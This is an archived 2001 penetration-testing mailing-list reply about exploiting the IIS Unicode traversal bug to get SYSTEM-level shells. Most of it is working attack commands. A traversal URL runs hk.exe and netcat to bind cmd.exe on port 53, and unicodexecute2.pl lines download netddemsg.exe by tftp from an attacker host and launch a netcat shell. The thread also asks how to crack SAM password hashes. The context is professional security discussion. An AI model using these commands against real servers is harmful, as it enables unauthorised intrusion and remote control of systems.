Penetration Testing mailing list archives

Re: [PEN-TEST] admin rights on an IIS 5.0 with unicode bug?

From: Nelson Brito <nelson () SECUNET COM BR>
Date: Tue, 27 Mar 2001 15:23:40 -0300

Renato Ettisberger wrote:

Hi there,

Hello! ;))

As you know, there is a way to span a shell with admin rights on a IIS
4.0
with the Unicode bug.

What way? Did you use CmdAsp.ASP to do that? Is it possible?

No, I use the tool hk.exe from RAZOR. With this tool, you can launch a
cmd.exe with system
privileges. Upload hk.exe and netcat to the server. The following URL binds
a netcat server
with system privileges on port 53 (this workes fine on our test server
IIS4.0, NT engl. Version)

http://www.target.com/msadc/..%c0%af../%c0%af../%c0%af../winnt/system32/cmd.exe?/c+c:

winnt\system32\hk.exe+cmd+/c+nc.exe+"-n"+"-l"+"-v"+"-p"+53+"-e"+cmd.exe

You could use the same technique with netddemsg.exe to do that! But, when I send
my first mail I made a *BIG* mistake, coz the netddemsg.exe usage is:
netddemsg.exe [-s <sharename>] <command line>

So you could do:
C:\uniexp>unicodexecute2.pl www.victim.com:80 "C:\\WINNT\\system32\\tftp.exe -i your.own.host.com GET netddemsg.exe"
C:\uniexp>unicodexecute2.pl www.victim.com:80 "C:\\WINNT\\system32\\net.exe share"

Ok, now you have the share's names:
C:\uniexp>unicodexecute2.pl www.victim.com:80 "netddemsg.exe -s SHARENAME \"nc.exe -n -l -d -p 53\""

PS: To know more about netddemsg.cpp take a look at:
http://www.atstake.com/research/advisories/2001/a020501-1.txt

PPS: Sorry, @Stake's folks, I didn't put the credits on my first mail. I'm really sorry.

[...]

BTW: My question is, how can I crack the password hash, when it comes in
the following form:

F:0x020020000000000000000000....
V:0x00000000a800000......

I don't know, what kid of tool are you using?

[...]

P.S: My English is not bad, it's horrible, but I hope you understand what
I'm talking about ;-)

Sem mais,
--
# Nelson Brito - IBQN / Security Networks AG - The trust Company!
# "Windows NT can also  be protected from nmap OS detection scans